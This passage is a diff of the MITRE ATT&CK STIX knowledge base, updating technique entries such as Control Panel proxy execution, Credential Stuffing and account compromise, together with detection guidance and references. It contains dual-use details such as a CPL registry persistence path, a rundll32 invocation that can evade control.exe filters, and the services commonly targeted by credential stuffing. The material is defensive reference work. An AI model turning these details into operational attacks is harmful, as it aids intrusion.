Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", - "id": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "persistence" - }, - { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" - } - ], - "modified": "2020-03-23T23:48:33.904Z", - "created": "2019-12-19T20:21:21.669Z", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_system_requirements": [ - "Ability to update component device firmware from the host operating system." - ], - "x_mitre_permissions_required": [ - "SYSTEM" - ], - "x_mitre_defense_bypassed": [ - "Anti-virus", - "Host intrusion prevention systems", - "File monitoring" - ], - "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.", "x_mitre_data_sources": [ "Component firmware", "Process monitoring", "Disk forensics", "API monitoring" ], - "x_mitre_platforms": [ - "Windows" - ] + "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.", + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Host intrusion prevention systems", + "File monitoring" + ], + "x_mitre_permissions_required": [ + "SYSTEM" + ], + "x_mitre_system_requirements": [ + "Ability to update component device firmware from the host operating system." + ], + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" }, { "id": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", @@ -4789,6 +5484,45 @@ "x_mitre_remote_support": true, "x_mitre_is_subtechnique": false }, + { + "id": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", + "description": "Before compromising a victim, adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).", + "name": "Compromise Accounts", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1586", + "url": "https://attack.mitre.org/techniques/T1586" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + } + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T18:05:46.296Z", + "created": "2020-10-01T01:17:15.965Z", + "x_mitre_data_sources": [ + "Social media monitoring" + ], + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_version": "1.0", + "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566))." + }, { "id": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", "description": "Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.\n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.", @@ -4868,6 +5602,62 @@ "Windows" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1584", + "url": "https://attack.mitre.org/techniques/T1584" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + }, + { + "source_name": "ICANNDomainNameHijacking", + "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.", + "url": "https://www.icann.org/groups/ssac/documents/sac-007-en" + }, + { + "source_name": "Talos DNSpionage Nov 2018", + "url": "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", + "description": "Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020." + }, + { + "source_name": "FireEye EPS Awakens Part 2", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + }, + { + "source_name": "NSA NCSC Turla OilRig", + "url": "https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf", + "description": "NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise Infrastructure", + "description": "Before compromising a victim, adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)", + "id": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T18:03:23.937Z", + "created": "2020-10-01T00:36:30.759Z", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_platforms": [ + "PRE" + ] + }, { "external_references": [ { @@ -5002,7 +5792,7 @@ }, { "id": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", - "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)\n\nFor ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.", + "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)", "name": "Control Panel", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -5015,9 +5805,9 @@ "url": "https://attack.mitre.org/techniques/T1218/002" }, { - "url": "https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx", + "source_name": "Microsoft Implementing CPL", "description": "M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.", - "source_name": "Microsoft Implementing CPL" + "url": "https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx" }, { "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf", @@ -5033,6 +5823,11 @@ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", "description": "Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.", "source_name": "Palo Alto Reaver Nov 2017" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "type": "attack-pattern", @@ -5042,8 +5837,11 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-20T22:33:18.929Z", + "modified": "2020-10-21T18:37:11.672Z", "created": "2020-01-23T19:59:52.630Z", + "x_mitre_contributors": [ + "ESET" + ], "x_mitre_platforms": [ "Windows" ], @@ -5055,7 +5853,7 @@ "Binary file metadata", "API monitoring" ], - "x_mitre_detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the Cpls and Extended Properties Registry keys of HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}). (Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)", + "x_mitre_detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)", "x_mitre_defense_bypassed": [ "Application control" ], @@ -5065,7 +5863,7 @@ "SYSTEM" ], "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0" + "x_mitre_version": "1.1" }, { "external_references": [ @@ -5178,7 +5976,7 @@ { "source_name": "Mandiant M-Trends 2020", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." }, { "source_name": "AWS CloudTrail Search", @@ -5203,7 +6001,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-18T11:45:36.417Z", + "modified": "2020-09-14T19:48:08.299Z", "created": "2020-05-14T14:45:15.978Z", "x_mitre_platforms": [ "AWS", @@ -5284,7 +6082,7 @@ { "source_name": "Mandiant M-Trends 2020", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." }, { "source_name": "AWS Cloud Trail Backup API", @@ -5321,7 +6119,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-19T14:45:59.618Z", + "modified": "2020-09-14T19:48:08.293Z", "created": "2020-06-09T15:33:13.563Z", "x_mitre_version": "1.0", "x_mitre_is_subtechnique": true, @@ -5345,26 +6143,6 @@ ] }, { - "created": "2020-01-10T16:03:18.865Z", - "modified": "2020-03-25T22:32:16.537Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "persistence" - }, - { - "kill_chain_name": "mitre-attack", - "phase_name": "privilege-escalation" - } - ], - "type": "attack-pattern", - "id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", - "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). ", - "name": "Create or Modify System Process", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], "external_references": [ { "source_name": "mitre-attack", @@ -5387,20 +6165,40 @@ "source_name": "OSX Malware Detection" } ], - "x_mitre_platforms": [ - "Windows", - "macOS", - "Linux" + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "x_mitre_detection": "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. \n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \n\nMonitor for changes to files associated with system-level processes.", - "x_mitre_is_subtechnique": false, - "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create or Modify System Process", + "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). ", + "id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "modified": "2020-10-09T13:46:29.922Z", + "created": "2020-01-10T16:03:18.865Z", "x_mitre_data_sources": [ "Windows event logs", "Windows Registry", "File monitoring", "Process command-line parameters", "Process monitoring" + ], + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_detection": "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. \n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \n\nMonitor for changes to files associated with system-level processes.", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" ] }, { @@ -5521,25 +6319,30 @@ ] }, { + "id": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)", + "name": "Credential Stuffing", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", "external_id": "T1110.004", "url": "https://attack.mitre.org/techniques/T1110/004" }, + { + "external_id": "CAPEC-600", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/600.html" + }, { "source_name": "US-CERT TA18-068A 2018", "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A", "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019." } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Credential Stuffing", - "description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)", - "id": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "type": "attack-pattern", "kill_chain_phases": [ { @@ -5547,22 +6350,8 @@ "phase_name": "credential-access" } ], - "modified": "2020-03-29T20:35:36.694Z", + "modified": "2020-10-19T22:43:45.475Z", "created": "2020-02-11T18:39:59.959Z", - "x_mitre_contributors": [ - "Diogo Fernandes", - "Anastasios Pingios" - ], - "x_mitre_data_sources": [ - "Authentication logs", - "Office 365 account logs" - ], - "x_mitre_permissions_required": [ - "User" - ], - "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, "x_mitre_platforms": [ "Linux", "macOS", @@ -5573,6 +6362,96 @@ "Office 365", "Azure AD", "SaaS" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.1", + "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_data_sources": [ + "Authentication logs", + "Office 365 account logs" + ], + "x_mitre_contributors": [ + "Diogo Fernandes", + "Anastasios Pingios" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1589.001", + "url": "https://attack.mitre.org/techniques/T1589/001" + }, + { + "source_name": "ATT ScanBox", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020." + }, + { + "source_name": "Register Deloitte", + "url": "https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/", + "description": "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020." + }, + { + "source_name": "Register Uber", + "url": "https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/", + "description": "McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020." + }, + { + "source_name": "Detectify Slack Tokens", + "url": "https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/", + "description": "Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020." + }, + { + "source_name": "Forbes GitHub Creds", + "url": "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196", + "description": "Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020." + }, + { + "source_name": "GitHub truffleHog", + "url": "https://github.com/dxa4481/truffleHog", + "description": "Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020." + }, + { + "source_name": "GitHub Gitrob", + "url": "https://github.com/michenriksen/gitrob", + "description": "Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020." + }, + { + "source_name": "CNET Leaks", + "url": "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/", + "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Credentials", + "description": "Before compromising a victim, adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via 